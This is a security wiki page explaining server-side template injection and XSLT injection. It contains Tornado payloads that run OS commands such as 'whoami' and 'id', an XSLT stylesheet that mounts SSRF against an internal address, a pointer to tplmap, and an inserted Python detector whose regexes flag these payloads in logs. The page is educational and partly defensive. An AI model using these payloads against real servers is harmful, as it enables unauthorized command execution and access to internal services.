Bug Culture Wiki
Contents:
  1. Server-Side Template Injection (SSTI)
    1. Introduction
    2. Submitting Payloads
      1. Tornado Payloads
      2. Tools
    3. Attacking XSLT
      1. SSRF with xsl:include
      2. Wordlist for XSLT
    4. References

Server-Side Template Injection (SSTI)

Introduction

Template engines read templates containing placeholder tokens and render them into output documents with the placeholders replaced by actual values. Web developers commonly use these templates to generate dynamic content. Server-Side Template Injection (SSTI) occurs when user input is insecurely merged into the template source itself rather than passed to it as data, allowing an attacker to inject template directives that the engine evaluates.

Submitting Payloads

One way to detect SSTI is by submitting mathematical expressions or template syntax and observing whether the server evaluates them. Below are some example payloads:

${7*7}
$

If the server responds with an evaluated result (e.g., 49), this indicates a potential SSTI vulnerability. Note that in some cases, evaluating expressions in the template engine can also lead to XSS if the output is re-injected into a web page without proper sanitization.

Tornado Payloads

For Tornado (a Python web framework) and similar engines, you can often call Python built-in functions or modules:

{% import os %}{{ os.popen("whoami").read() }}
{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

These payloads demonstrate how an attacker can execute OS commands (e.g., whoami, id) through the template engine.
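From the defender's side, the probe expressions above and the Tornado payloads are also what an SSTI attempt looks like in web server logs. The following is an added example, not part of the original wiki page: a small Python detector that parses constructed combined-format access log lines, URL-decodes the request path, and flags the template-syntax and Python-escape patterns discussed in this section. The log lines, the field layout and the rule names are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format); not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /greet?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=%24%7B7*7%7D HTTP/1.1" 200 511
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 511
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /greet?name=%7B%25+import+os+%25%7D%7B%7B+os.popen%28%22whoami%22%29.read%28%29+%7D%7D HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /greet?name=%7B%7Brequest.application.__globals__.__builtins__%7D%7D HTTP/1.1" 500 0
"""

# Signatures derived from the probe payloads and Tornado payloads discussed above.
# Rule names are constructed for this example.
PROBE_PATTERNS = {
    # Arithmetic inside ${...} or {{...}}: the classic "does it print 49?" probe.
    "expr_probe": re.compile(r"(\$\{|\{\{)\s*\d+\s*[*+\-/]\s*\d+"),
    # Tornado-style statement block importing a module.
    "tornado_import": re.compile(r"\{%\s*import\s+\w+\s*%\}"),
    # Walking Python internals to reach builtins / arbitrary imports.
    "dunder_escape": re.compile(r"__(globals|builtins|import|class|subclasses|mro)__"),
    # Direct OS command execution helpers.
    "os_exec": re.compile(r"\bos\.(popen|system)\s*\("),
}

# client - - [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def analyze_log(text):
    """Return a list of (src_ip, status, rule, decoded_path) for suspicious requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than failing the whole run
        src, _ts, _method, raw_path, status = m.groups()
        # Decode twice so that singly and doubly URL-encoded probes both normalise.
        path = unquote_plus(unquote_plus(raw_path))
        for rule, pat in PROBE_PATTERNS.items():
            if pat.search(path):
                findings.append((src, int(status), rule, path))
                break  # one finding per request is enough for triage
    return findings


if __name__ == "__main__":
    for src, status, rule, path in analyze_log(SAMPLE_LOG):
        print(f"{src} {status} {rule}: {path}")
```

A 200 response to an arithmetic probe is the case worth escalating first, since it suggests the expression was rendered rather than rejected; 500s on the later payloads are consistent with a hardened template call failing on the injected syntax.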

Tools

tplmap.py can help automate:

  1. Identifying which template engine is in use.
  2. Injecting and exploiting the template vulnerability.

Attacking XSLT

Extensible Stylesheet Language Transformations (XSLT) is an XML-based language often used to transform XML documents into HTML, other XML documents, or PDFs. XSLT Server-Side Injection can occur when:

  • Arbitrary XSLT files can be uploaded.
  • The application generates an XSL Transformation's XML document dynamically using unvalidated user input.

SSRF with xsl:include

When you control the transformation, you can include external resources to perform Server-Side Request Forgery (SSRF). For example:

<!-- ssrf.xsl -->
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
                xmlns:abc="http://php.net/xsl"
                version="1.0">
    <xsl:include href="http://127.0.0.1:5000/xslt"/>
    <xsl:template match="/">
    </xsl:template>
</xsl:stylesheet>

By specifying a resource on 127.0.0.1, you might force the server to load or disclose internal services/data, effectively mounting an SSRF attack.

Wordlist for XSLT

You can also use the following wordlist to brute-force functionality available in the target application:

https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/xslt.txt

References